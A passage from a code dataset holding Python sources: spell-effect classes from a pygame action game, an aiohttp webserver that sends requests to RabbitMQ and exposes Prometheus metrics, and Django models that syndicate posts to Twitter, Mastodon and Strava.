self.caster.torso_animation = \"Cast\"\n self.caster.frame = 0\n self.caster.tframe = 0\n self.caster.casting = True\n self.caster.mbreaktime = 45\n\nclass Fire_2(Spell):\n def s_init(self):\n self.cost = 12\n if self.caster.mp[0] < self.cost: self.finished = True; return\n self.frames = [\"m_fire1_\" + str(x) + \".png\" for x in range(1,6)]\n self.flame_entities = []\n self.caster.mbreaktime = 40\n self.caster.mp[0] -= self.cost\n self.mydir = self.caster.direction * 2 - 1\n self.unchdir = self.caster.direction\n self.x += self.mydir * 10\n self.rise = 0\n\n def s_blit(self, surf, ALT_X, ALT_Y):\n c = 0\n for flame in self.flame_entities:\n if flame == -666: continue\n gimg, grect = DATA.mag_images[\"m_fire1_glow.png\"]\n img, rect = DATA.mag_images[self.frames[flame%5]]\n rect.midbottom = (self.x + flame*4, self.y-math.sin(flame/2.0)*5.0+c*self.rise+((c+0.001)**(abs(self.rise)+1))*[1,-1][self.rise<0])\n rect.move_ip(ALT_X, ALT_Y)\n grect.midbottom = (self.x + flame*4, self.y-math.sin(flame/2.0)*5.0+c*self.rise+((c+0.001)**(abs(self.rise)+1))*[1,-1][self.rise<0])\n grect.move_ip(ALT_X, ALT_Y+3)\n for y in range(-1,2):\n surf.blit(img, rect.move(0,y*flame))\n surf.blit(gimg, grect.move(0, y*flame))\n c += 1\n\n def stick(self):\n\n self.y = self.caster.y - 25\n self.x = self.caster.x\n self.caster.jumping = False\n if len(self.flame_entities) < 8:\n self.caster.direction = self.unchdir\n\n if not self.ticker % 2:\n if len(self.flame_entities) < 8:\n self.flame_entities = [0] + self.flame_entities\n\n self.flame_entities = [[x + self.mydir,-666][[x<-65 or x>0,x>65 or x<0][self.unchdir]] for x in self.flame_entities]\n\n\n if self.caster.up_held: self.rise -= 0.05\n if self.caster.down_held: self.rise += 0.05\n\n # Collision detections\n\n c = 0\n for flame in self.flame_entities:\n\n if flame == -666: continue\n img, rect = DATA.mag_images[self.frames[flame%5]]\n rect.midbottom = (self.x + flame*4, self.y-math.sin(flame/2.0)*5.0+c*self.rise+((c+0.001)**(abs(self.rise)+1))*[1,-1][self.rise<0])\n\n for y in range(-1,2):\n if self.check_collide(rect.move(0, y*flame)):\n self.flame_entities[c] = -666\n\n c += 1\n\n if sum(self.flame_entities) == 8 * -666:\n self.finished = True\n\n def check_collide(self, crect):\n for monster in self.MONSTERSTATE:\n monsterrect = pygame.rect.Rect((0,0,monster.collision_dist*2,monster.collision_hdist*2))\n monsterrect.center = monster.x, monster.y\n if crect.colliderect(monsterrect):\n damage = (self.caster.magic[0] * 8)/60.0\n self.caster.combodamage += min(monster.hp, damage)\n 
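                # Apply the hit: react_to_magic triggers the monster's damage
                # response, while fvm/fvd record the last monster hit and the
                # amount dealt for the face-view display (see Spell.__init__).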
monster.react_to_magic(damage)\n self.fvm = monster\n self.fvd = damage\n self.caster.combo += 1\n return True\n return False\n\nclass Quake(Spell):\n def s_init(self):\n self.cost = 15\n if self.caster.mp[0] < self.cost: self.finished = True; return\n self.caster.mbreaktime = 26\n self.caster.mp[0] -= self.cost\n self.ticker = 0\n self.px = 0\n self.py = 0\n\n def s_blit(self, surf, ALT_X, ALT_Y):\n self.caster.quaking = True\n\n def stick(self):\n self.ticker += 1\n hitlist = []\n if not self.ticker%20:\n for mon in self.MONSTERSTATE:\n if mon.x > self.caster.x - 350 and mon.x < self.caster.x + 350:\n if mon.affected[\"quake\"]:\n hitlist.append(mon)\n for monster in hitlist:\n damage = self.caster.magic[0] * 0.8\n damage *= random.randint(75, 125)/100.0\n self.caster.combodamage += min(damage, monster.hp)\n monster.react_to_damage(int(damage))\n self.caster.combo += 1\n\n\n if self.ticker == 100:\n self.finished = True\n self.caster.quaking = False\n\n\nclass Implosion_1(Spell):\n def s_init(self):\n global DATA\n self.affected = []\n self.cant = self.caster.mp[0] < 15\n def s_blit(self, surf, ALT_X, ALT_Y):\n global DATA\n pic = DATA.mag_images[\"bubble.png\"][0]\n if not self.affected:\n if self.ticker >= 0: self.finished = True\n return\n\n for mon in self.affected:\n moncentre = (mon.x + ALT_X, mon.y-40 + ALT_Y)\n eachang = (math.pi/4)\n r = max(0, 300 - self.ticker*15)\n turn = self.ticker / 5.0\n sp = max(4, 20-self.ticker/2)\n for x in range(8):\n for c in range(10):\n xp = math.cos(x * eachang + turn + (c * 0.15)*(-1**c)) * (r + c * sp)\n yp = math.sin(x * eachang + turn + (c * 0.15)*(-1**c)) * (r + c * sp)\n rect = pic.get_rect()\n rect.center = moncentre\n rect.move_ip(xp, yp)\n surf.blit(pic, rect)\n\n def stick(self):\n if self.affected == []:\n for monster in self.MONSTERSTATE:\n xdist = abs(monster.x-self.caster.x)\n if xdist < 400 and not monster.isdead:\n if self.caster.mp[0] >= 15:\n self.affected.append(monster)\n\n self.affected.sort(key=lambda x: x.maxhp)\n\n if len(self.affected):\n self.affected = self.affected[:1]\n self.caster.mp[0] -= 15\n self.SOUND = \"Implosion.ogg\"\n self.caster.animation = \"Stopped\"\n self.caster.torso_animation = \"Cast\"\n self.caster.frame = 0\n self.caster.tframe = 0\n self.caster.casting = True\n self.caster.mbreaktime = 25\n\n for mon in self.affected:\n if self.ticker >= 20 and not self.ticker%5:\n dmg = int(random.randint(90,155)/100.0 * self.caster.magic[0] * 0.8)\n self.caster.combodamage += min(dmg, mon.hp)\n mon.react_to_magic(dmg)\n self.fvm = mon\n self.fvd = dmg\n self.caster.combo += 1\n\n if self.ticker >= 31:\n self.finished = True\n\n\nclass Summon_Maea(Spell):\n def s_init(self):\n global DATA\n self.cost = 80\n if self.caster.mp[0] < self.cost: self.finished = True; return\n self.caster.mbreaktime = 50\n self.caster.mp[0] -= self.cost\n self.dir = self.caster.direction\n self.x = [640, -262][self.dir]\n self.inertia = [-10, 10][self.dir]\n self.bubbles = []\n self.bombs = []\n self.y = 50\n self.inertia2 = 0\n\n self.mouthpos = (130, 50)\n\n def s_blit(self, surf, ALT_X, ALT_Y):\n global DATA\n\n darkness = pygame.Surface((640, 480))\n if self.ticker < 120:\n darkness.set_alpha(7 * min(30, self.ticker))\n else:\n darkness.set_alpha(max(0, 1050 - self.ticker*7))\n\n surf.blit(darkness, (0,0))\n\n if self.dir:\n surf.blit(DATA.images[\"Summon1.png\"][0], (self.x, self.y))\n else:\n surf.blit(pygame.transform.flip(DATA.images[\"Summon1.png\"][0], True, False), (self.x, self.y))\n\n for x, y, p in self.bombs:\n bfs, bfr 
= DATA.images[\"bluefire.png\"]\n nbfs = pygame.transform.scale(bfs, (int(math.cos(-p/2) * 240), int(math.sin(p) * 250)))\n nbfr = nbfs.get_rect()\n nbfr.midbottom = (x, y + 5)\n nbfr.move_ip(ALT_X, ALT_Y)\n surf.blit(nbfs, nbfr)\n\n for x, y, a in self.bubbles:\n bs, br = DATA.mag_images[\"bubble.png\"]\n surf.blit(bs, br.move(self.mouthpos).move(x,y))\n\n def stick(self):\n self.x += self.inertia\n if self.dir:\n self.inertia -= 0.1\n else:\n self.inertia += 0.1\n\n self.inertia2 += 0.01\n self.y += self.inertia2\n\n if self.x < -280 or self.x > 658: self.finished = True\n\n if self.ticker <= 100 and not self.ticker%9:\n if self.dir:\n sp = int(self.caster.x - 300)\n else:\n sp = int(self.caster.x + 300)\n\n cx = [sp - self.ticker * 8, sp + self.ticker * 8][self.dir]\n self.bombs.append([cx, ground_at(self.LEVELSTATE, cx, True), 0])\n\n # We want angle to swing like a pendulum between 45 and 135 degrees\n degree_variance = math.sin(self.ticker/6.0) * 80\n bdv = -degree_variance\n degree = degree_variance + 90\n angle = math.radians(degree)\n self.bubbles.append([self.x, self.y, angle])\n degree = bdv + 90\n angle = math.radians(degree)\n self.bubbles.append([self.x, self.y, angle])\n\n for b in range(len(self.bubbles)):\n self.bubbles[b][0] += math.cos(self.bubbles[b][2]) * 10\n self.bubbles[b][1] += math.sin(self.bubbles[b][2]) * 10\n\n for z in range(len(self.bombs)):\n self.bombs[z][2] += 0.1\n if self.bombs[z][2] > 3:\n self.bombs[z] = None\n continue\n\n hitlist = []\n if abs(self.bombs[z][2] - 1.1) < 0.0000001:\n for monster in self.MONSTERSTATE:\n if abs(monster.x - self.bombs[z][0]) < 100:\n if monster.y > self.bombs[z][1] - 220:\n hitlist.append(monster)\n\n for monster in hitlist:\n damage = self.caster.magic[0] * random.randint(8, 12) / 20.0\n monster.react_to_damage(int(damage))\n self.fvm = monster\n self.fvd = damage\n\n self.caster.Take_Damage(-1)\n\n biggerhitlist = []\n for monster in self.MONSTERSTATE:\n if abs(monster.x - self.x) < 400:\n if monster not in biggerhitlist:\n biggerhitlist.append(monster)\n for monster in biggerhitlist:\n damage = 1\n monster.react_to_damage(int(damage))\n self.fvm = monster\n self.fvd = damage\n\n\n while None in self.bombs:\n self.bombs.remove(None)\n","repo_name":"ardentryst/ardentryst","sub_path":"magic.py","file_name":"magic.py","file_ext":"py","file_size_in_byte":21457,"program_lang":"python","lang":"en","doc_type":"code","stars":25,"dataset":"github-code","pt":"37"} +{"seq_id":"24517077928","text":"# Built-in library\nimport asyncio\nimport logging\nimport time\n\n# Third-party library\nimport rx.operators as ops\nimport prometheus_client\nfrom prometheus_client import Gauge, Summary, Counter, CONTENT_TYPE_LATEST\nfrom rx.subject import Subject\nfrom rx.scheduler.eventloop import AsyncIOScheduler\nfrom aiohttp import web, ClientSession\nfrom aio_pika import connect_robust\n\n# Costum library\nfrom handler import OrderHandler, AccountHandler\n\n# Log configuration\nLOG_REQUEST_FORMAT = logging.Formatter('%(asctime)s|%(levelname)s|%(message)s')\nLOG_REQUEST_HANDLER = logging.FileHandler('request.log')\nLOG_REQUEST_HANDLER.setFormatter(LOG_REQUEST_FORMAT)\n\nclass Webserver:\n def __init__(self):\n self.app = web.Application()\n self.webservice = ClientSession()\n self.loop = asyncio.get_event_loop()\n self.request = Subject() # Requests observable object\n self.subscriptions = [] # List for containing disposable request observer\n self.rmqConn = None\n self.channel = {}\n self.orderHandler = OrderHandler()\n self.accountHandler = 
AccountHandler()\n self.requestLogger = logging.getLogger('request')\n self.requestLogger.addHandler(LOG_REQUEST_HANDLER)\n self.requestLogger.setLevel(logging.INFO)\n\n\n def logRequest(self, request : web.Request):\n self.requestLogger.info(f\"Incoming request <- {request.remote}|{request.method}|{request.path}\")\n\n # General handler for dispatching request to every request observers\n async def dispatcher(self, request: web.Request) -> web.Response:\n startTime = time.time()\n self.app['REQUEST_PROGRESS'].labels(request.path, request.method).inc()\n future = asyncio.Future()\n request['future'] = future\n request['loop'] = self.loop\n\n try:\n body = await request.json()\n request['body'] = body\n request['queue'] = request.path.replace('/','')\n request['channel'] = self.channel[request.path]\n except Exception as e:\n self.app['REQUEST_PROGRESS'].labels(request.path, request.method).dec()\n self.app['REQUEST_COUNT'].labels(request.path, request.method).inc()\n return web.json_response({'status':'FAIL', 'order_id': None, 'client_ref': None, 'reason':'Failed to parse request body'}, status=400)\n\n self.request.on_next(request) # Pass the request to the observers\n\n await future\n result = future.result() # Get the result response from the observers\n\n latency = time.time() - startTime\n self.app['REQUEST_LATENCY'].labels(request.path, request.method).observe(latency)\n self.app['REQUEST_PROGRESS'].labels(request.path, request.method).dec()\n self.app['REQUEST_COUNT'].labels(request.path, request.method).inc()\n\n return result\n\n async def accountQuery(self, request: web.Request) -> web.Response:\n startTime = time.time()\n self.app['REQUEST_PROGRESS'].labels(request.path, request.method).inc()\n account = request.match_info['account']\n\n response = {'results': []}\n async with self.webservice.get(f'http://localhost:8001/accounts/{account}') as resp:\n response = await resp.json()\n\n latency = time.time() - startTime\n self.app['REQUEST_LATENCY'].labels(request.path, request.method).observe(latency)\n self.app['REQUEST_PROGRESS'].labels(request.path, request.method).dec()\n self.app['REQUEST_COUNT'].labels(request.path, request.method).inc()\n\n return web.json_response(response)\n\n async def orderQuery(self, request: web.Request) -> web.Response:\n startTime = time.time()\n self.app['REQUEST_PROGRESS'].labels(request.path, request.method).inc()\n account = request.match_info['account']\n\n response = {'results': []}\n async with self.webservice.get(f'http://localhost:8002/orders/{account}') as resp:\n response = await resp.json()\n\n latency = time.time() - startTime\n self.app['REQUEST_LATENCY'].labels(request.path, request.method).observe(latency)\n self.app['REQUEST_PROGRESS'].labels(request.path, request.method).dec()\n self.app['REQUEST_COUNT'].labels(request.path, request.method).inc()\n\n return web.json_response(response)\n\n async def metrics(self, request: web.Request) -> web.Response:\n resp = web.Response(body=prometheus_client.generate_latest())\n resp.content_type = CONTENT_TYPE_LATEST\n return resp\n\n async def on_shutdown(self, app: web.Application):\n await self.rmqConn.close()\n map(lambda i: i.dispose(), self.subscriptions)\n\n\n async def init(self):\n self.app['REQUEST_COUNT'] = Counter('request_total', 'Total Incoming Request', ('path', 'method'), unit='requests')\n self.app['REQUEST_LATENCY'] = Summary('request_latency', 'Request Process Time', ('path', 'method'), unit='seconds')\n self.app['REQUEST_PROGRESS'] = Gauge('request_progress', 'Request in 
Progress', ('path', 'method'), unit='requests')\n\n # Establish connection to RabbitMQ\n self.rmqConn = await connect_robust(login='ikhwanrnurzaman', password='123456')\n\n # Establish channel for order request and declare order queue\n self.channel['/order'] = await self.rmqConn.channel()\n await self.channel['/order'].declare_queue('order', durable=True)\n\n # Establish channel for account request and declare account queue\n self.channel['/account'] = await self.rmqConn.channel()\n await self.channel['/account'].declare_queue('account', durable=True)\n\n # Create disposable request observer for handling order request. Only request to /order will be passed to OrderHandler\n dispose = self.request.pipe(\n ops.filter(lambda i : i.path == '/order'),\n ops.do_action(self.logRequest),\n ops.filter(self.orderHandler.orderVerificator)\n ).subscribe(self.orderHandler, scheduler=AsyncIOScheduler)\n self.subscriptions.append(dispose)\n\n # Create disposable request observer for handling account request. Only request to /account will be passed to OrderHandler\n dispose = self.request.pipe(\n ops.filter(lambda i : i.path == '/account'),\n ops.do_action(self.logRequest),\n ops.filter(self.accountHandler.accountVerificator)\n ).subscribe(self.accountHandler, scheduler=AsyncIOScheduler)\n self.subscriptions.append(dispose)\n\n self.app.router.add_post('/order', self.dispatcher, name='order')\n self.app.router.add_get('/orders/{account}', self.orderQuery)\n self.app.router.add_post('/account', self.dispatcher, name='account')\n self.app.router.add_get('/accounts/{account}', self.accountQuery)\n self.app.router.add_get('/metrics', self.metrics)\n self.app.on_shutdown.append(self.on_shutdown)\n\n return self.app\n\n def run(self):\n web.run_app(self.init())\n\nwebserver = Webserver()\nwebserver.run()","repo_name":"irnurzaman/reactive-webserver","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":7010,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"1465617730","text":"from typing import Any, Dict, Tuple\nfrom urllib.parse import urlparse\nimport re\n\nimport tweepy\nfrom django.conf import settings\nfrom django.contrib.contenttypes.fields import (GenericForeignKey,\n GenericRelation)\nfrom django.contrib.contenttypes.models import ContentType\nfrom django.db import models\n\nfrom syndications.mastodon_client import Client as MastodonClient\nfrom django.db.models import UniqueConstraint\nimport bleach\nfrom webmentions.models import OutgoingContent\nfrom django.urls import reverse\n\n# Create your models here.\nclass Syndication():\n name = models.TextField(max_length=50)\n url = models.TextField(max_length=2000)\n\n @staticmethod\n def get_twitter_v2_client():\n return tweepy.Client(\n consumer_key=settings.TWITTER_CONSUMER_KEY, \n consumer_secret=settings.TWITTER_CONSUMER_SECRET,\n access_token=settings.TWITTER_ACCESS_TOKEN_KEY,\n access_token_secret=settings.TWITTER_ACCESS_TOKEN_SECRET\n )\n\n @staticmethod\n def get_twitter_v1_client():\n auth = tweepy.OAuthHandler(settings.TWITTER_CONSUMER_KEY, settings.TWITTER_CONSUMER_SECRET)\n auth.set_access_token(settings.TWITTER_ACCESS_TOKEN_KEY, settings.TWITTER_ACCESS_TOKEN_SECRET)\n \n return tweepy.API(auth)\n\n @staticmethod\n def syndicate_to_twitter(update=None, media=None):\n client = Syndication.get_twitter_v2_client()\n media_ids = None\n\n if media is not None:\n api = Syndication.get_twitter_v1_client()\n media_response = api.media_upload(media.filename, 
file=media.file)\n media_id = media_response.media_id_string\n api.create_media_metadata(media_id, media.alt_text)\n\n media_ids = [media_id]\n\n response = client.create_tweet(text=update.status, in_reply_to_tweet_id=update.in_reply_to_status_id, media_ids=media_ids, user_auth=True)\n return response\n\n @staticmethod\n def delete_from_twitter(id_str):\n client = Syndication.get_twitter_v2_client()\n \n response = client.delete_tweet(id_str, user_auth=True)\n return response\n\n @staticmethod\n def syndicate_to_mastodon(status=None, media=None):\n if media is not None:\n response = MastodonClient.post_media(media.file, media.thumbnail, media.description, media.focus)\n\n if status is not None:\n status.media_ids = [response['id']]\n\n return MastodonClient.post_status(status.status, status.idempotency_key, status.in_reply_to_id, status.media_ids)\n \n @staticmethod\n def favorite_on_mastodon(id=None):\n if id is None:\n return\n \n return MastodonClient.favorite_status(id)\n \n @staticmethod\n def unfavorite_on_mastodon(id=None):\n if id is None:\n return\n \n return MastodonClient.unfavorite_status(id)\n \n @staticmethod\n def boost_on_mastodon(id=None):\n if id is None:\n return\n \n return MastodonClient.boost_status(id)\n \n @staticmethod\n def unboost_on_mastodon(id=None):\n if id is None:\n return\n \n return MastodonClient.unboost_status(id)\n\n @staticmethod\n def delete_from_mastodon(id):\n return MastodonClient.delete_status(id)\n \n @staticmethod\n def update_mastodon_replies(id):\n status = MastodonStatus.objects.filter(id_str=id).first()\n\n if status is None:\n replies = MastodonReply.objects.filter(in_reply_to_id_str=id)\n for reply in replies:\n reply.delete()\n return\n\n context = MastodonClient.get_status_context(id)\n\n if context is None:\n return\n \n if context.get(\"descendants\") is None:\n replies = MastodonReply.objects.filter(in_reply_to_id_str=id)\n for reply in replies:\n reply.delete()\n return\n \n processed_ids = []\n \n for descendent in context[\"descendants\"]:\n if descendent.get(\"in_reply_to_id\") != id:\n continue\n\n descendent_status = MastodonClient.get_status(descendent.get(\"id\"))\n\n content = descendent_status[\"content\"]\n content = bleach.clean(content, tags=bleach.sanitizer.ALLOWED_TAGS.union(('p', 'br')))\n content = bleach.linkify(content)\n\n MastodonReply.objects.update_or_create(\n id_str=descendent_status[\"id\"], \n defaults={\n 'in_reply_to_id_str':descendent_status[\"in_reply_to_id\"],\n 'content':content,\n 'author_name':descendent_status[\"account\"].get(\"display_name\"),\n 'author_url':descendent_status[\"account\"].get(\"url\"),\n 'author_photo':descendent_status[\"account\"].get(\"avatar_static\"),\n 'published':descendent_status[\"created_at\"],\n 'url':descendent_status[\"url\"],\n 'reply_to_url':status.content_object.get_permalink()\n } \n )\n\n processed_ids.append(descendent_status[\"id\"])\n\n replies = MastodonReply.objects.filter(in_reply_to_id_str=status.id_str).exclude(id_str__in=processed_ids)\n for reply in replies:\n reply.delete()\n\n @staticmethod\n def update_mastodon_boosts(id):\n print('updating mastodon boosts for status ' + id)\n status = MastodonStatus.objects.filter(id_str=id).first()\n\n if status is None:\n print('status is none')\n boosts = MastodonBoost.objects.filter(boost_of_id_str=status.id_str)\n for boost in boosts:\n boost.delete()\n return\n\n accounts = MastodonClient.get_status_boost_accounts_all(id)\n\n if accounts is None:\n print('accounts is none')\n boosts = 
MastodonBoost.objects.filter(boost_of_id_str=status.id_str)\n for boost in boosts:\n boost.delete()\n return\n \n processed_ids = []\n \n print(str(len(accounts)) + ' accounts to process')\n for account in accounts:\n boost = MastodonBoost.objects.update_or_create(\n account_id_str=account[\"id\"],\n boost_of_id_str=status.id_str,\n defaults={\n 'url': status.url,\n 'author_name': account[\"display_name\"],\n 'author_url': account[\"url\"],\n 'author_photo': account[\"avatar_static\"],\n 'boost_of_id_str': status.id_str,\n 'repost_of_url': status.content_object.get_permalink()\n }\n )[0]\n\n boost_status = MastodonClient.get_account_status_by_reblog_of_id(reblog_of_id=boost.boost_of_id_str, account_id=boost.account_id_str)\n\n processed_ids.append(account[\"id\"])\n\n if boost_status is None:\n print('no status found')\n continue\n \n print('boost status id ', boost_status.get('id'))\n boost.published = boost_status.get(\"created_at\")\n boost.save()\n\n \n print(str(len(processed_ids)) + ' boosts processed')\n boosts = MastodonBoost.objects.filter(boost_of_id_str=status.id_str).exclude(account_id_str__in=processed_ids)\n \n print(str(len(boosts)) + ' boosts to remove')\n for boost in boosts:\n boost.delete()\n\n @staticmethod\n def update_mastodon_favourites(id):\n status = MastodonStatus.objects.filter(id_str=id).first()\n\n if status is None:\n favourites = MastodonFavourite.objects.filter(like_of_url=status.id_str)\n for favourite in favourites:\n favourite.delete()\n return\n\n accounts = MastodonClient.get_status_favorite_accounts_all(id)\n \n if accounts is None:\n favourites = MastodonFavourite.objects.filter(like_of_url=status.id_str)\n for favourite in favourites:\n favourite.delete()\n return\n \n processed_ids = []\n\n for account in accounts:\n MastodonFavourite.objects.update_or_create(\n account_id_str=account[\"id\"],\n favourite_of_id_str=status.id_str,\n defaults={\n 'url':status.url,\n 'author_name':account[\"display_name\"],\n 'author_url':account[\"url\"],\n 'author_photo':account[\"avatar_static\"],\n 'favourite_of_id_str':status.id_str,\n 'like_of_url':status.content_object.get_permalink()\n }\n ) \n\n processed_ids.append(account[\"id\"])\n\n favourites = MastodonFavourite.objects.all().filter(favourite_of_id_str=status.id_str).exclude(account_id_str__in=processed_ids)\n\n for favourite in favourites:\n favourite.delete()\n\n class Meta:\n abstract = True\n\nclass TwitterUser(models.Model):\n id_str = models.CharField(max_length=40,primary_key=True)\n name = models.CharField(max_length=100)\n screen_name = models.CharField(max_length=30)\n\nclass Tweet(models.Model):\n id_str = models.CharField(max_length=40)\n created_at = models.DateTimeField(null=True)\n screen_name = models.CharField(max_length=30)\n content_type = models.ForeignKey(ContentType, on_delete=models.CASCADE)\n object_id = models.PositiveIntegerField()\n content_object = GenericForeignKey('content_type', 'object_id')\n full_text = models.CharField(max_length=560, null=True)\n user = models.ForeignKey(TwitterUser, on_delete=models.PROTECT, related_name='tweets', null=True)\n in_reply_to_status_id_str=models.CharField(max_length=40, blank=True, null=True)\n in_reply_to_screen_name=models.CharField(max_length=100, blank=True, null=True)\n\n def get_url(self):\n screen_name = self.screen_name\n\n if self.user is not None:\n screen_name = self.user.screen_name\n\n return f'https://twitter.com/{screen_name}/status/{self.id_str}'\n\n def to_syndication(self):\n return 
Syndication(name='Twitter',url=self.get_url())\n\nclass TwitterSyndicatable(models.Model):\n syndicated_to_twitter = models.DateTimeField(null=True)\n syndicate_to_twitter = models.BooleanField(default=False)\n tweet = GenericRelation(Tweet)\n tweet_length_limit = 280\n tweet_link_length = 23\n\n def get_tweet_datetime(self):\n tweet_created_at = self.tweet.get().created_at\n\n if tweet_created_at is not None:\n return tweet_created_at\n \n return self.syndicated_to_twitter\n \n def is_syndicated_to_twitter(self):\n return self.tweet.all().exists()\n\n def to_twitter_status(self): \n \"\"\"Return the content that should be the tweet status.\"\"\"\n raise NotImplementedError(\"to_twitter_status not implemented.\")\n \n def get_twitter_reply_to_url(self):\n \"\"\"Return the url that should be checked for the in_reply_to_id.\"\"\"\n raise NotImplementedError(\"get_twitter_reply_to_url not implemented.\")\n\n def to_twitter_status_update(self):\n \"\"\"Converts the model to an object able to post to Twitter.\"\"\"\n\n # Get the basic Twitter Status object from the content.\n update = TwitterStatusUpdate(self.to_twitter_status())\n\n # If Note is not replying to anything, return the update as it is.\n if self.get_twitter_reply_to_url() is None:\n return update\n\n # Check if the reply to url is a twitter url, if it's a twitter status,\n # parse the screen name and status id from it.\n is_twitter_url, is_twitter_status, reply_to_screen_name, reply_to_status_id = TwitterSyndicatable.parse_twitter_url(self.get_twitter_reply_to_url())\n\n # If the reply to url is not a twitter url and is not a twitter status,\n # append the reply to url to the end of the Note content.\n if not is_twitter_url or not is_twitter_status:\n update.status = f'{update.status} {self.in_reply_to}'\n return update\n\n # Otherwise it's a reply. 
Add that data to the update object.\n update.in_reply_to_status_id = reply_to_status_id\n return update\n \n def has_twitter_media(self):\n \"\"\"Returns True if the Model has media to upload.\"\"\"\n return False\n \n def get_twitter_media_image_field(self):\n \"\"\"Returns the ImageField for the media.\"\"\"\n raise NotImplementedError(\"get_twitter_media_image_field not implemented.\")\n\n def get_twitter__media_alttext(self):\n \"\"\"Returns the description for the media.\"\"\"\n raise NotImplementedError(\"get_twitter__media_alttext not implemented.\")\n\n def get_twitter_media(self):\n if not self.has_twitter_media():\n return None\n\n media = self.get_twitter_media_image_field()\n\n media_upload = TwitterMedia(media.name.split('/')[-1], file=media, alt_text=self.get_twitter__media_alttext())\n return media_upload \n\n @staticmethod\n def parse_twitter_url(url):\n o = urlparse(url)\n\n if o.netloc != 'twitter.com':\n return False, False, None, None\n\n pieces = o.path.split(\"/\")\n\n if len(pieces) < 4:\n return True, False, None, None\n\n if pieces[2].lower() != 'status':\n return True, False, None, None\n \n return True, True, pieces[1], pieces[3]\n\n class Meta:\n abstract = True\n\nclass TwitterStatusUpdate(object):\n def __init__(self, status=None, in_reply_to_status_id=None, attachment_url=None):\n self.status = status\n self.in_reply_to_status_id = in_reply_to_status_id\n self.attachment_url = attachment_url\n\nclass TwitterMedia(object):\n def __init__(self, filename, file=None, alt_text=None):\n self.filename = filename\n self.file = file\n self.alt_text = alt_text\n\n#class StravaLatLng(models.Model):\n# lat = models.FloatField()\n# lng = models.FloatField()\n#\n# class Meta:\n# abstract = True\n#\n#class StravaPolylineMap(models.Model):\n# polyline = models.Text()\n# summary_polyline = models.Text()\n#\n# class Meta:\n# abstract = True\n#\n#class PhotosSummaryPrimary(models.Model):\n# source = models.IntegerField()\n# unique_id = models.CharField(max_length=255)\n# urls = models.TextField()\n#\n# class Meta:\n# abstract = True\n#\n#class PhotosSummary(models.Model):\n# count = models.IntegerField()\n# primary = models.OneToOneField(PhotosSummaryPrimary, on_delete=models.CASCADE)\n#\n# class Meta:\n# abstract = True\n#\n#class SummaryGear(models.Model):\n# strava_id = models.CharField(max_length=255)\n# resource_state = models.IntegerField()\n# primary = models.BooleanField()\n# name = models.Text()\n# distance = models.FloatField()\n#\n# class Meta:\n# abstract = True\n#\nclass StravaActivity(models.Model):\n content_type = models.ForeignKey(ContentType, on_delete=models.CASCADE)\n object_id = models.PositiveIntegerField()\n content_object = GenericForeignKey('content_type', 'object_id')\n\n strava_id = models.BigIntegerField()\n #external_id = models.CharField(max_length=255)\n #upload_id = models.BigIntegerField()\n athlete = models.IntegerField()\n #name = models.Text()\n distance = models.FloatField()\n moving_time = models.IntegerField()\n elapsed_time = models.IntegerField()\n total_elevation_gain = models.FloatField()\n #elev_high = models.FloatField()\n #elev_high = models.FloatField()\n type = models.CharField(max_length=30)\n start_date = models.DateTimeField()\n start_date_local = models.DateTimeField()\n timezone = models.CharField(max_length=50)\n #start_latlng = models.OneToOneField(StravaLatLng, on_delete=models.CASCADE)\n #end_latlng = models.OneToOneField(StravaLatLng, on_delete=models.CASCADE)\n #achievement_count = models.IntegerField()\n #kudos_count = 
models.IntegerField()\n #comment_count = models.IntegerField()\n #athlete_count = models.IntegerField()\n #photo_count = models.IntegerField()\n #total_photo_count = models.IntegerField()\n #map = models.OneToOneField(StravaPolylineMap, on_delete=models.CASCADE)\n #trainer = models.BooleanField()\n #commute = models.BooleanField()\n #manual = models.BooleanField()\n private = models.BooleanField()\n #flagged = models.BooleanField()\n #workout_type = models.IntegerField()\n #upload_id_str = models.CharField(max_length=128)\n #average_speed = models.FloatField()\n #max_speed = models.FloatField()\n #has_kudoed = models.BooleanField()\n #gear_id = models.CharField(255)\n #kilojoules = models.FloatField()\n #average_watts = models.FloatField()\n #device_watts = models.BooleanField()\n #max_watts = models.IntegerField()\n #weighted_average_watts = models.IntegerField()\n #description = models.TextField(null=True)\n #photos = models.OneToOneField(StravaPhotosSummary, on_delete=models.CASCADE)\n #gear = models.ForeignKey(SummaryGear)\n #calories = models.FloatField()\n\n def get_url(self):\n return f'https://www.strava.com/activities/{self.strava_id}'\n\n#class DetailedSegmentEfford(models.Model):\n# strava_id = models.BigIntegerField()\n# elapsed_time = models.IntegerField()\n# start_date = models.DateTimeField()\n# start_date_local = models.DateTimeField()\n# distance = models.FloatField()\n# is_kom = models.BooleanField()\n# name = models.TextField()\n# activity = models.ForeignKey(StravaActivity, on_delete=models.CASCADE)\n# athlete = models.IntegerField()\n# moving_time = models.IntegerField()\n# start_index = models.IntegerField()\n# end_index = models.IntegerField()\n# average_cadence = models.FloatField()\n# average_watts = models.FloatField()\n# device_watts = models.BooleanField()\n# average_heartrate = models.FloatField()\n# max_heartrate = models.FloatField()\n#\n# class Meta:\n# abstract = True\n\nclass StravaSyndicatable(models.Model):\n strava_activity = GenericRelation(StravaActivity)\n \n def is_syndicated_to_strava(self):\n return self.strava_activity.all().exists()\n\n class Meta:\n abstract = True\n\nclass StravaWebhook(models.Model):\n verify_token = models.CharField(max_length=32)\n subscription_id = models.IntegerField(null=True)\n\n def __str__(self):\n return 'Webhook: {}'.format(self.verify_token)\n\nclass StravaWebhookEvent(models.Model):\n object_type = models.CharField(max_length=16)\n object_id = models.BigIntegerField()\n aspect_type = models.CharField(max_length=12)\n updates = models.TextField()\n owner_id = models.BigIntegerField()\n subscription_id = models.IntegerField()\n event_time = models.BigIntegerField()\n\n# \n# MASTODON SYNDICATION FEATURE\n# \nclass MastodonStatus(models.Model):\n \"\"\"\n The Mastodon Status from Mastodon.\n \"\"\"\n id_str = models.CharField(max_length=40)\n url = models.CharField(max_length=2048)\n content_type = models.ForeignKey(ContentType, on_delete=models.CASCADE)\n object_id = models.PositiveIntegerField()\n content_object = GenericForeignKey('content_type', 'object_id')\n created_at = models.DateTimeField()\n\n def save(self,*args,**kwargs):\n super().save(*args,**kwargs)\n \n MastodonStatusesToProcess.objects.get_or_create(id_str=self.id_str)\n\nclass MastodonStatusUpdate(object):\n \"\"\"\n An object to contain the necessary data to publish a Mastodon Status.\n \"\"\"\n def __init__(self, status=None, idempotency_key=None, 